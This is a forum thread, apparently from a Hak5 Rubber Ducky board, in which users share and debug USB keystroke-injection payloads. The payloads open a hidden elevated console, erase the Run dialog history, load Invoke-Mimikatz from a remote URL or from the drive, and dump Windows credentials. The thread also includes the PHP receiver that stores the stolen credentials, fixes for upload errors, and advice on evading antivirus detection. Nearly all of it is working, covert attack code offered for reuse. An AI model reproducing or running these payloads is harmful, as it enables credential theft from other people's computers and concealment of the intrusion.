0x41414141 Posted October 22, 2016 Share Posted October 22, 2016 (edited) I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER Edited November 8, 2016 by 0x41414141 clarification Quote Link to comment Share on other sites More sharing options...
Us3rnotfound Posted October 25, 2016 Share Posted October 25, 2016 (edited) You don't know how to make the script work without a web server by any chance do you? I'd like to get the information to save on the ducky itself. Edited October 25, 2016 by Us3rnotfound Quote Link to comment Share on other sites More sharing options...
0x41414141 Posted October 25, 2016 Author Share Posted October 25, 2016 3 hours ago, Us3rnotfound said: You don't know how to make the script work without a web server by any chance do you? I'd like to get the information to save on the ducky itself. Do you already have a working version of c_duck_v2.1.hex? Quote Link to comment Share on other sites More sharing options...
Us3rnotfound Posted October 25, 2016 Share Posted October 25, 2016 3 hours ago, 0x41414141 said: Do you already have a working version of c_duck_v2.1.hex? Have the brand new device and the encoder program, that's about it. Quote Link to comment Share on other sites More sharing options...
0x41414141 Posted October 25, 2016 Author Share Posted October 25, 2016 (edited) On 10/25/2016 at 7:44 AM, Us3rnotfound said: Have the brand new device and the encoder program, that's about it. In that case you'll need to flash your firmware to a composite edition (i.e. c_duck_v2.1.hex) to function as a Twin Duck (both a USB drive and HID device). Here is a hybrid script that will work on your current default firmware. It will download the powershell script from a remote web server and save the mimikatz output to the local machine in the %temp% folder. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://paste.ee/r/Xopop');Invoke-Mimikatz -DumpCreds|Out-File '%temp%\mimikatz.txt';"&exit ENTER I'll follow up with another version for the Twin Duck firmware. Edited November 8, 2016 by 0x41414141 Quote Link to comment Share on other sites More sharing options...
0x41414141 Posted October 26, 2016 Author Share Posted October 26, 2016 (edited) Here's a version for the Twin Duck. Make sure you leave the ducky plugged in long enough for the creds file to be written in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d ENTER DELAY 500 STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';" ENTER Edited November 8, 2016 by 0x41414141 clarification Quote Link to comment Share on other sites More sharing options...
scottisheyebrow Posted November 1, 2016 Share Posted November 1, 2016 This hack looks really great! I'm new to the rubber ducky. Is there any way someone could change these commands to work on OSX? Thanks! Quote Link to comment Share on other sites More sharing options...
Bitbot17 Posted November 3, 2016 Share Posted November 3, 2016 do you have a link for the twinduck firmware? also doe the last script you wrote also contain the scripts to remove evidense?(powershell, CMD, and run command) because i want to try this out on my own computer Quote Link to comment Share on other sites More sharing options...
0x41414141 Posted November 3, 2016 Author Share Posted November 3, 2016 (edited) 1 hour ago, Bitbot17 said: do you have a link for the twinduck firmware? also doe the last script you wrote also contain the scripts to remove evidense?(powershell, CMD, and run command) because i want to try this out on my own computer Sure, I recommend you install Git to download all the relevant Rubber Ducky code. Once you've installed Git, simply run the following command to clone everything: git clone https://github.com/hak5darren/USB-Rubber-Ducky.git From there, follow the instructions posted @ https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky The Twin Duck firmware is located in USB-Rubber-Ducky/Firmware/Images/ -- there are several versions but try c_duck_v2.1.hex Yes, the last script also cleans up the evidence. If you use the script, make sure you download Invoke-Mimikatz.ps1 and copy/rename it on your Twin Duck as im.ps1, you'll also need to modify the drive volume label to read DUCK Edited November 3, 2016 by 0x41414141 clarification Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted November 5, 2016 Share Posted November 5, 2016 Fantastic payload 0x41414141 I really like the run line that both opens an obfuscated CMD as well as removes all traces of the command. Might I make one alteration. On Windows 10 you'll receive the following error: The screen cannot be set to the number of lines and columns specified. This is because Windows 10 has a minimum command prompt column size of 18, unlike previous versions 14. So to cover most bases, I recommend: STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" Superb payload! Quote Link to comment Share on other sites More sharing options...
Decoy Posted November 8, 2016 Share Posted November 8, 2016 This is unbelievably fast... and quiet :) Great payload. Quote Link to comment Share on other sites More sharing options...
Zereco Posted November 10, 2016 Share Posted November 10, 2016 Hey Guys, Awesome .. ! After 3 hours and so much things learned, it's finally running properly !! :) (Twin duck) Here the full payload, there's an ESC to close the autorun windows + set-executionpolicy remotesigned to allow running scripts on the system + ALT F4 at the end to close windows. DELAY 3000 ESC DELAY 500 GUI r DELAY 1000 STRING powershell DELAY 300 ENTER DELAY 300 STRING set-executionpolicy remotesigned DELAY 300 ENTER DELAY 300 STRING o DELAY 300 ENTER DELAY 300 STRING exit DELAY 300 ENTER DELAY 500 GUI r DELAY 300 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=40 cols=160® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" DELAY 500 ENTER DELAY 1000 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set DUCKY=%d DELAY 300 ENTER DELAY 1000 STRING if exist %DUCKY%\mimi.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %DUCKY%\mimi.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%DUCKY%\%computername%_creds.txt';" DELAY 300 ENTER DELAY 300 ALT F4 Still, it needs 5-10 sec to writte the log file. Something else : Here : https://ducktoolkit.com/encoder/ We need apparently to wipe out the cache of the browser or smth like that, cause when u encode, seems to encode the first payload you already encoded before .. (Am i clear :p ?) Or it's just a bad move from me. Cheers guys Quote Link to comment Share on other sites More sharing options...
Bitbot17 Posted November 21, 2016 Share Posted November 21, 2016 (edited) @Darren Kitchen can you update the link in your github tutorial for the usbrubber duckyfrom this link http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip to https://github.com/midnitesnake/USB-Rubber-Ducky/blob/master/Flash/Duck Programming.zip it took me an hour to find the file. and how do i put the payload on the ducky via windows? Edited November 21, 2016 by Bitbot17 Quote Link to comment Share on other sites More sharing options...
Bitbot17 Posted November 21, 2016 Share Posted November 21, 2016 On 10/25/2016 at 9:39 PM, 0x41414141 said: Here's a version for the Twin Duck. Make sure you leave the ducky plugged in long enough for the creds file to be written in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d ENTER DELAY 500 STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';" ENTER so i have this made the payload and tried it on my machine, but i am receiving an error that says it could not find 'for' and 'xist' i am running windows 7 pro Quote Link to comment Share on other sites More sharing options...
BrandonEckert Posted December 7, 2016 Share Posted December 7, 2016 Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the powershell command, I receive the following error. Any ideas? Exception calling "UploadString" with "2" argument(s): "The remote server retur ned an error: (417) Expectation Failed." At line:1 char:151 + IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps 1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<< ('http://<my domain.com>/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException Quote Link to comment Share on other sites More sharing options...
Enzym3 Posted December 7, 2016 Share Posted December 7, 2016 3 hours ago, BrandonEckert said: Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the powershell command, I receive the following error. Any ideas? Exception calling "UploadString" with "2" argument(s): "The remote server retur ned an error: (417) Expectation Failed." At line:1 char:151 + IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps 1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<< ('http://<my domain.com>/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException Is that the EXACT output from the console, or did you edit the URL for privacy before posting? If this is copied straight from your console, then the problem would be: IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://<my domain.com>/capture.php',$o) You'd need to change the highlighted section to an actual domain which you wish to use. I have a feeling you edited it like that on purpose, but it wouldn't be the first time I've seen someone copy/paste code and run it without noticing it needs to be modified to fit first. Quote Link to comment Share on other sites More sharing options...
Enzym3 Posted December 7, 2016 Share Posted December 7, 2016 4 hours ago, BrandonEckert said: Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the powershell command, I receive the following error. Any ideas? Exception calling "UploadString" with "2" argument(s): "The remote server retur ned an error: (417) Expectation Failed." At line:1 char:151 + IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps 1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<< ('http://<my domain.com>/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException If my above response wasn't helpful, try adding this line of code before the Net.WebClient line: [System.Net.ServicePointManager]::Expect100Continue = $false http://stackoverflow.com/questions/566437/http-post-returns-error-417-expectation-failed Quote Link to comment Share on other sites More sharing options...
BrandonEckert Posted December 7, 2016 Share Posted December 7, 2016 Sorry, yes I did redact my domain. I added that and now receive the following. Any ideas?: o)" Exception calling "UploadString" with "2" argument(s): "The remote server retur ned an error: (406) Not Acceptable." At line:1 char:151 + IEX(New-Object Net.WebClient).DownloadString('http://<my domain>/im.ps 1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<< ('http://<my domain>/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException Quote Link to comment Share on other sites More sharing options...
BrandonEckert Posted December 7, 2016 Share Posted December 7, 2016 Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the Output: C:\Windows\system32>powershell -NoP -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString('http://10.0.0.199/capture.php',$o)" Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed." At line:1 char:204 + IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString <<<< ('http://10.0.0.199/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException Quote Link to comment Share on other sites More sharing options...
Mr.X Posted December 8, 2016 Share Posted December 8, 2016 On 10/26/2016 at 3:39 AM, 0x41414141 said: Here's a version for the Twin Duck. Make sure you leave the ducky plugged in long enough for the creds file to be written in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d ENTER DELAY 500 STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';" ENTER I ran it together with the correct im.ps1 on a Windows 10 machine(yes my usb is named 'DUCK'). Commands ran properly until the last STRING I think then the powershell session just did nothing and hanged on the last string. A file was never created so I am assuming mimikatz didn't even run. Could it be the case sensivity in ' do @set duck=%d' and %duck%? I have the feeling the last IF isn't executed because it is returned False. Quote Link to comment Share on other sites More sharing options...
shr00mie Posted December 24, 2016 Share Posted December 24, 2016 On 12/7/2016 at 3:54 PM, BrandonEckert said: Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the Output: C:\Windows\system32>powershell -NoP -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString('http://10.0.0.199/capture.php',$o)" Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed." At line:1 char:204 + IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString <<<< ('http://10.0.0.199/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException i was having the same problem. definitely spent quite a bit of time on the interwebs trying to figure this particular bitch out. turns out it has something to do with HTML1.0 vs 1.1 and how it relates to the "Expect and 100 (Continue)" component: http://www8.org/w8-papers/5c-protocols/key/key.html Quote Expect and 100 (Continue) Some HTTP requests (for example, the PUT or POST methods) carry request bodies, which may be arbitrarily long. If, the server is not willing to accept the request, perhaps because of an authentication failure, it would be a waste of bandwidth to transmit such a large request body. HTTP/1.1 includes a new status code, 100 (Continue), to inform the client that the request body should be transmitted. When this mechanism is used, the client first sends its request headers, then waits for a response. If the response is an error code, such as 401 (Unauthorized), indicating that the server does not need to read the request body, the request is terminated. If the response is 100 (Continue), the client can then send the request body, knowing that the server will accept it. However, HTTP/1.0 clients do not understand the 100 (Continue) response. Therefore, in order to trigger the use of this mechanism, the client sends the new Expect header, with a value of 100-continue. (The Expect header could be used for other, future purposes not defined in HTTP/1.1.) Because not all servers use this mechanism (the Expect header is a relatively late addition to HTTP/1.1, and early ``HTTP/1.1'' servers did not implement it), the client must not wait indefinitely for a 100 (Continue) response before sending its request body. HTTP/1.1 specifies a number of somewhat complex rules to avoid either infinite waits or wasted bandwidth. We lack sufficient experience based on deployed implementations to know if this design will work efficiently. while someone provided the solution, the trick is that it has to be the first command in the line. current working theory is that after PS loads net.webclient, you are no longer able to alter the configuration it's already running as for the remainder of the session. if you, on the other hand, change the setting before any net.webclient components are loaded in the session, subsequent net.webclient instances launched for the remainder of the session will pull from this configuration. below is how i finally got the code to work without throwing any errors on the PS side. [System.Net.ServicePointManager]::Expect100Continue = $false ; IEX (New-Object Net.WebClient).DownloadString('http://ADDRESS/im.ps1') ; $output = Invoke-Mimikatz -DumpCreds ; (New-Object Net.WebClient).UploadString('http://ADDRESS/rx.php' , $output ) then i banged my head against the table for a good 24 hours trying to figure out why the server/rx.php script wasn't creating the .creds file. a good night's sleep and a clear head did the trick. Quote Link to comment Share on other sites More sharing options...
henna3 Posted January 14, 2017 Share Posted January 14, 2017 I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround? Amazing twin duck payload! Thanks. Quote Link to comment Share on other sites More sharing options...
felipe Posted January 20, 2017 Share Posted January 20, 2017 (edited) unfortunately mimikatz got detected. do not upload anything to virustotal. Edited January 20, 2017 by felipe Quote Link to comment Share on other sites More sharing options...
MrMoi Posted February 5, 2017 Share Posted February 5, 2017 Hi @0x41414141 Can you please show us the source code of your file "rx.php" ? thank you Quote Link to comment Share on other sites More sharing options...
0x41414141 Posted February 6, 2017 Author Share Posted February 6, 2017 On 2/5/2017 at 2:39 AM, MrMoi said: Hi @0x41414141 Can you please show us the source code of your file "rx.php" ? thank you Here you go. <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.